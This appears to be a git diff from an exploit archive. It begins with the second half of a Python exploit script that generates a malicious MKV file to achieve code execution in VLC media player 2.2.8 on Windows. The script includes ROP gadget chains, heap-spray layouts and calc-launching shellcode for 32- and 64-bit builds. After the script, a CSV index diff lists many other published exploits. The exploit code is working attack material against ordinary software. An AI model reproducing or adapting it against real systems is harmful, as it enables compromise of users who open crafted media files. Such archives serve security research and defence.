0x0040848c, # JMP ds:[EAX * 4 + 40e000] [vlc.exe]
0x00407086, # POP EDI # RETN [vlc.exe]
0x0040ae95, # MOV EAX,DWORD PTR [EAX] # RETN [vlc.exe]
0x0040af61, # PUSHAD # ROL BYTE PTR [EAX], 0FFH # LOOPNE VLC+0XAEF8 (0040AEF8)
target_address + 0x5e0, # Shellcode
],
}
}
if bits == '64':
target_address_packed = pack("<Q", target_addresses[bits])
rop_chain = ''.join(pack('<Q', _) for _ in rop_gadgets[bits][version])
# https://github.com/peterferrie/win-exec-calc-shellcode/tree/master/build/bin
# w64-exec-calc-shellcode-esp.bin
shellcode = (
"\x66\x83\xe4\xf0\x50\x6a\x60\x5a\x68\x63\x61\x6c\x63\x54\x59\x48"
"\x29\xd4\x65\x48\x8b\x32\x48\x8b\x76\x18\x48\x8b\x76\x10\x48\xad"
"\x48\x8b\x30\x48\x8b\x7e\x30\x03\x57\x3c\x8b\x5c\x17\x28\x8b\x74"
"\x1f\x20\x48\x01\xfe\x8b\x54\x1f\x24\x0f\xb7\x2c\x17\x8d\x52\x02"
"\xad\x81\x3c\x07\x57\x69\x6e\x45\x75\xef\x8b\x74\x1f\x1c\x48\x01"
"\xfe\x8b\x34\xae\x48\x01\xf7\x99\xff\xd7"
# add shellcode to avoid crashes by terminating the process
# xor rcx, rcx # mov rax, pExit # call [rax]
"\x48\x31\xc9\x48\xc7\xc0" + pack("<I", pExit) + "\xff\x10")
if size == 0x180:
UAF_object = '\x41'
while len(UAF_object) < size:
UAF_object += UAF_object
UAF_object = UAF_object[:size]
UAF_object = UAF_object[:0x30] + target_address_packed + UAF_object[0x38:]
UAF_object = UAF_object[:0x38] + pack("<Q", target_address + 0x10000) + UAF_object[0x40:]
UAF_object = UAF_object[:0x168] + pack("<Q", target_address + 0x3c0) + UAF_object[0x170:]
UAF_object = UAF_object[:0x170] + target_address_packed + UAF_object[0x178:]
return UAF_object
else:
block = '\x00'
block_size = 0x1000
while len(block) < block_size:
block += block
block = block[:block_size]
block = block[:0x0] + '\x41' * 4 + block[0x4:]
block = block[:0x8] + target_address_packed + block[0x10:]
block = block[:0x10] + target_address_packed + block[0x18:]
block = block[:0x40] + pack("<Q", 0x1) + block[0x48:]
block = block[:0x58] + pack("<Q", target_address + 0x3a8) + block[0x60:]
block = block[:0xE4] + pack("<Q", 0x1) + block[0xEC:]
block = block[:0x1b8] + pack("<Q", target_address + 0x80) + block[0x1c0:]
block = block[:0x3b8] + rop_chain + block[0x3b8+len(rop_chain):]
block = block[:0x500] + shellcode + block[0x500 + len(shellcode):]
block = block[:0x6d8] + pack("<Q", target_address + 0x10) + block[0x6e0:]
while len(block) < size:
block += block
return block[:size]
else:
target_address_packed = pack("<I", target_addresses[bits])
rop_chain = ''.join(pack('<I', _) for _ in rop_gadgets[bits][version])
# https://github.com/peterferrie/win-exec-calc-shellcode/tree/master/build/bin
# w32-exec-calc-shellcode.bin
shellcode = (
"\x83\xE4\xFC\x31\xD2\x52\x68\x63\x61\x6C\x63\x54\x59\x52\x51\x64"
"\x8B\x72\x30\x8B\x76\x0C\x8B\x76\x0C\xAD\x8B\x30\x8B\x7E\x18\x8B"
"\x5F\x3C\x8B\x5C\x1F\x78\x8B\x74\x1F\x20\x01\xFE\x8B\x54\x1F\x24"
"\x0F\xB7\x2C\x17\x42\x42\xAD\x81\x3C\x07\x57\x69\x6E\x45\x75\xF0"
"\x8B\x74\x1F\x1C\x01\xFE\x03\x3C\xAE\xFF\xD7"
# add shellcode to avoid crashes by terminating the process
# xor eax, eax # push eax # mov eax, pExit # jmp eax
"\x31\xC0\x50\xA1" + pack("<I", pExit) + "\xff\xe0")
if size == 0x100:
UAF_object = '\x41'
while len(UAF_object) < size:
UAF_object += UAF_object
UAF_object = UAF_object[:size]
UAF_object = UAF_object[:0x28] + target_address_packed + UAF_object[0x2c:]
UAF_object = UAF_object[:0x2c] + pack("<I", target_address + 0x10000) + UAF_object[0x30:]
UAF_object = UAF_object[:0xf4] + pack("<I", target_address + 0x2bc) + UAF_object[0xf8:]
UAF_object = UAF_object[:0xf8] + target_address_packed + UAF_object[0xfc:]
return UAF_object
else:
block = '\x00'
block_size = 0x1000
while len(block) < block_size:
block += block
block = block[:block_size]
block = block[:0x0] + pack("<I", 0x22000040) + block[0x4:]
block = block[:0x4] + target_address_packed + block[0x8:]
block = block[:0x8] + target_address_packed + block[0xc:]
block = block[:0x10] + pack("<I", 0xc85) + block[0x14:]
block = block[:0x30] + pack("<I", 0x1) + block[0x34:]
block = block[:0xc0] + pack("<I", 0x1) + block[0xc4:]
block = block[:0x194] + pack("<I", 0x2200031c) + block[0x198:]
block = block[:0x2c0] + pack("<I", 0x220002e4) + block[0x2c4:]
block = block[:0x2f4] + pack("<I", 0x22000310) + block[0x2f8:]
block = block[:0x2f8] + rop_chain + block[0x2f8+len(rop_chain):]
block = block[:0x564] + pack("<I", 0x22000588) + block[0x568:]
block = block[:0x5e0] + shellcode + block[0x5e0+len(shellcode):]
while len(block) < size:
block += block
return block[:size]
def build_exploit(bits, version):
# EBML Header
DocType = "\x42\x82" + data_size(8) + "matroska"
EBML = "\x1a\x45\xdf\xa3" + data_size(len(DocType)) + DocType
# Seek Entries
SeekEntry = "\x53\xab" + data_size(4) # SeekID
SeekEntry += "\x15\x49\xa9\x66" # KaxInfo
SeekEntry += "\x53\xac" + data_size(2) + "\xff" * 2 # SeekPosition + Index of Segment info
SeekEntries = "\x4d\xbb" + data_size(len(SeekEntry)) + SeekEntry # Seek Entry
SeekEntry = "\x53\xab" + data_size(4) # SeekID
SeekEntry += "\x11\x4d\x9b\x74" # KaxSeekHead
SeekEntry += "\x53\xac" + data_size(4) + "\xff" * 4 # SeekPosition + Index of SeekHead
SeekEntries += "\x4d\xbb" + data_size(len(SeekEntry)) + SeekEntry # Seek Entry
SeekEntry = "\x53\xab" + data_size(4) # SeekID
SeekEntry += "\x10\x43\xa7\x70" # KaxChapters
SeekEntry += "\x53\xac" + data_size(4) + "\xff" * 4 # SeekPosition + Index of Chapters
SeekEntries += "\x4d\xbb" + data_size(len(SeekEntry)) + SeekEntry # Seek Entry
# SeekHead
SeekHead = "\x11\x4d\x9b\x74" + data_size(len(SeekEntries)) + SeekEntries
# Void
Void = "\xec" + data_size(2) + "\x41" # Trigger bug with an out-of-order element
# Info
SegmentUID = "\x73\xa4" + data_size(16) + uuid.uuid4().bytes
Info = "\x15\x49\xa9\x66" + data_size(len(SegmentUID)) + SegmentUID
# Chapters
ChapterSegmentUID = "\x6e\x67" + data_size(16) + uuid.uuid4().bytes
ChapterAtom = "\xb6" + data_size(len(ChapterSegmentUID)) + ChapterSegmentUID
EditionEntry = "\x45\xb9" + data_size(len(ChapterAtom)) + ChapterAtom
Chapters = "\x10\x43\xa7\x70" + data_size(len(EditionEntry)) + EditionEntry
if bits == '64':
size = 0x180
count = 60
else:
size = 0x100
count = 30
# Attachments
print "[+] Generating UAF objects...",
AttachedFiles = ""
for i in range(500):
AttachedFiles += str(AttachedFile(build_data(size, bits, version)))
Attachments = "\x19\x41\xa4\x69" + data_size(len(AttachedFiles)) + AttachedFiles
print "done"
# Cluster
print "[+] Generating payload...",
payload = build_data(0xfff000, bits, version)
SimpleBlocks = "\xa3" + data_size(len(payload)) + payload
SimpleBlocksLength = len(SimpleBlocks) * count
Timecode = "\xe7" + data_size(1) + "\x00"
Cluster = "\x1f\x43\xb6\x75" + data_size(len(Timecode) + SimpleBlocksLength) + Timecode
print "done"
# Concatenate everything
SegmentData = SeekHead + Void + Info + Chapters + Attachments + Cluster
Segment = "\x18\x53\x80\x67" + data_size(len(SegmentData) + SimpleBlocksLength) + SegmentData
mkv = EBML + Segment
print "[+] Writing poc MKV...",
with open('poc.mkv', 'wb') as fp:
fp.write(mkv)
for i in range(count):
fp.write(SimpleBlocks)
print "done"
# Bug requires another MKV file in the same directory, hence we
# generate another 'minimally valid' MKV file that VLC will parse
# Also able to use any other valid MKV file...
auxi_mkv = mkv[:0x4f] + "\x15\x49\xa9\x66" + data_size(10) # Add some arbitrary size
print "[+] Writing auxiliary MKV...",
with open('auxi.mkv', 'wb') as fp:
fp.write(auxi_mkv)
print "done"
if __name__ == '__main__':
bits = '64' # 32 / 64
version = '2.2.8'
print "Building exploit for %s-bit VLC media player %s on Windows" % (bits, version)
build_exploit(bits, version)
print "Open VLC and drag and drop in poc.mkv"

13
files_exploits.csv
View file

@ -4193,7 +4193,7 @@ id,file,description,date,author,type,platform,port
33104,exploits/multiple/dos/33104.txt,"Star Wars Battlefront II 1.1 - Remote Denial of Service",2009-06-24,"Luigi Auriemma",dos,multiple,
33105,exploits/multiple/dos/33105.txt,"TrackMania 2.11.11 - Multiple Remote Vulnerabilities",2009-06-27,"Luigi Auriemma",dos,multiple,
33133,exploits/multiple/dos/33133.txt,"Adobe Flash Player 10.0.22 / AIR - URI Parsing Heap Buffer Overflow (PoC)",2009-07-30,iDefense,dos,multiple,
33134,exploits/linux/dos/33134.txt,"Adobe Flash Player 10.0.22 and AIR - 'intf_count' Integer Overflow",2009-07-30,"Roee Hay",dos,linux,
33134,exploits/linux/dos/33134.txt,"Adobe Flash Player 10.0.22 / AIR - 'intf_count' Integer Overflow",2009-07-30,"Roee Hay",dos,linux,
33584,exploits/multiple/dos/33584.txt,"IBM DB2 - 'kuddb2' Remote Denial of Service",2010-01-31,"Evgeny Legerov",dos,multiple,
33148,exploits/linux/dos/33148.c,"Linux Kernel 2.6.x - 'posix-timers.c' Null Pointer Dereference Denial of Service",2009-08-06,"Hiroshi Shimamoto",dos,linux,
33173,exploits/windows/dos/33173.html,"Microsoft Internet Explorer 6/7/8 - 'li' Element Denial of Service (1)",2007-02-07,trevordixon,dos,windows,
@ -6013,6 +6013,9 @@ id,file,description,date,author,type,platform,port
44965,exploits/hardware/dos/44965.py,"Delta Industrial Automation COMMGR 1.08 - Stack Buffer Overflow (PoC)",2018-07-02,t4rkd3vilz,dos,hardware,80
44972,exploits/linux/dos/44972.py,"openslp 2.0.0 - Double-Free",2018-07-03,"Magnus Klaaborg Stubman",dos,linux,
44994,exploits/linux/dos/44994.html,"Tor Browser < 0.3.2.10 - Use After Free (PoC)",2018-07-09,t4rkd3vilz,dos,linux,
45011,exploits/windows/dos/45011.js,"Microsoft Edge Chakra JIT - Out-of-Bounds Reads/Writes",2018-07-12,"Google Security Research",dos,windows,
45012,exploits/windows/dos/45012.js,"Microsoft Edge Chakra JIT - BoundFunction::NewInstance Out-of-Bounds Read",2018-07-12,"Google Security Research",dos,windows,
45013,exploits/windows/dos/45013.js,"Microsoft Edge Chakra JIT - Type Confusion with Hoisted SetConcatStrMultiItemBE Instructions",2018-07-12,"Google Security Research",dos,windows,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -9804,9 +9807,11 @@ id,file,description,date,author,type,platform,port
44920,exploits/linux/local/44920.txt,"Dell EMC RecoverPoint < 5.1.2 - Local Root Command Execution",2018-06-21,"Paul Taylor",local,linux,
44961,exploits/windows/local/44961.txt,"Enhanced Mitigation Experience Toolkit (EMET) - XML External Entity Injection",2018-07-02,hyp3rlinx,local,windows,
44971,exploits/windows/local/44971.rb,"Boxoft WAV to MP3 Converter 1.1 - Buffer Overflow (Metasploit)",2018-07-03,Metasploit,local,windows,
44979,exploits/windows/local/44979.py,"VLC media player 2.2.8 - Arbitrary Code Execution (PoC)",2018-07-05,"Eugene Ng",local,windows,
44983,exploits/hardware/local/44983.txt,"ADB Broadband Gateways / Routers - Local Root Jailbreak",2018-07-05,"SEC Consult",local,hardware,
44984,exploits/hardware/local/44984.txt,"ADB Broadband Gateways / Routers - Privilege Escalation",2018-07-05,"SEC Consult",local,hardware,
44989,exploits/windows/local/44989.py,"Boxoft WAV to WMA Converter 1.0 - Local Buffer Overflow (SEH)",2018-07-09,Achilles,local,windows,
45010,exploits/linux/local/45010.c,"Linux Kernel < 4.13.9 (Ubuntu 16.04/Fedora 27) - Local Privilege Escalation",2018-07-10,rlarabee,local,linux,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -31339,7 +31344,7 @@ id,file,description,date,author,type,platform,port
29499,exploits/php/webapps/29499.txt,"SMF 1.1 - 'index.php' HTML Injection",2007-01-20,"Aria-Security Team",webapps,php,
29500,exploits/asp/webapps/29500.txt,"RASPcalendar 1.01 (ASP) - Admin Login",2013-11-08,"Hackeri-AL UAH-Crew",webapps,asp,
29504,exploits/php/webapps/29504.txt,"Unique Ads - 'Banner.php' SQL Injection",2007-01-22,Linux_Drox,webapps,php,
29505,exploits/php/webapps/29505.txt,"212Cafe Board - Multiple Cross-Site Scripting Vulnerabilities",2007-01-22,Linux_Drox,webapps,php,
29505,exploits/php/webapps/29505.txt,"212Cafe Board 0.08 Beta / 6.30 Beta - Multiple Cross-Site Scripting Vulnerabilities",2007-01-22,Linux_Drox,webapps,php,
29506,exploits/php/webapps/29506.txt,"Bitweaver 1.3.1 Articles and Blogs - Multiple Cross-Site Scripting Vulnerabilities",2007-01-22,CorryL,webapps,php,
29507,exploits/php/webapps/29507.txt,"212Cafe Guestbook 4.00 - 'show.php' Cross-Site Scripting",2007-01-22,Linux_Drox,webapps,php,
29508,exploits/php/webapps/29508.sh,"Vote! Pro 4.0 - Multiple PHP Code Execution Vulnerabilities",2007-01-23,r0ut3r,webapps,php,
@ -34304,7 +34309,7 @@ id,file,description,date,author,type,platform,port
34476,exploits/php/webapps/34476.txt,"Zomplog 3.9 - 'message' Cross-Site Scripting",2010-08-15,10n1z3d,webapps,php,
34477,exploits/php/webapps/34477.txt,"Joomla! Component com_fireboard - 'Itemid' SQL Injection",2010-08-15,"ViRuS Qalaa",webapps,php,
34479,exploits/php/webapps/34479.html,"CMSimple 3.3 - Cross-Site Scripting / Cross-Site Request Forgery",2010-08-16,"High-Tech Bridge SA",webapps,php,
34481,exploits/php/webapps/34481.txt,"123 Flash Chat - Multiple Vulnerabilities",2010-08-16,Lincoln,webapps,php,
34481,exploits/php/webapps/34481.txt,"123 Flash Chat 7.8 - Multiple Vulnerabilities",2010-08-16,Lincoln,webapps,php,
34482,exploits/php/webapps/34482.txt,"TurnkeyForms Yahoo Answers Clone - 'questiondetail.php' Cross-Site Scripting",2009-08-10,Moudi,webapps,php,
34483,exploits/php/webapps/34483.txt,"Nasim Guest Book - 'page' Cross-Site Scripting",2010-08-10,Moudi,webapps,php,
34484,exploits/php/webapps/34484.txt,"Joomla! Component com_dirfrm - Multiple SQL Injections",2010-08-18,Hieuneo,webapps,php,
@ -39644,4 +39649,4 @@ id,file,description,date,author,type,platform,port
44999,exploits/linux/webapps/44999.txt,"Elektronischer Leitz-Ordner 10 - SQL Injection",2018-07-10,"Jens Regel",webapps,linux,
45002,exploits/hardware/webapps/45002.py,"D-Link DIR601 2.02 - Credential Disclosure",2018-07-10,"Thomas Zuk",webapps,hardware,
45003,exploits/php/webapps/45003.txt,"Instagram-Clone Script 2.0 - Cross-Site Scripting",2018-07-11,L0RD,webapps,php,
45007,exploits/linux/webapps/45007.txt,"Dicoogle PACS 2.5.0 - Directory Traversal",2018-07-11,"Carlos Avila",webapps,linux,
45007,exploits/multiple/webapps/45007.txt,"Dicoogle PACS 2.5.0 - Directory Traversal",2018-07-11,"Carlos Avila",webapps,multiple,

Can't render this file because it is too large.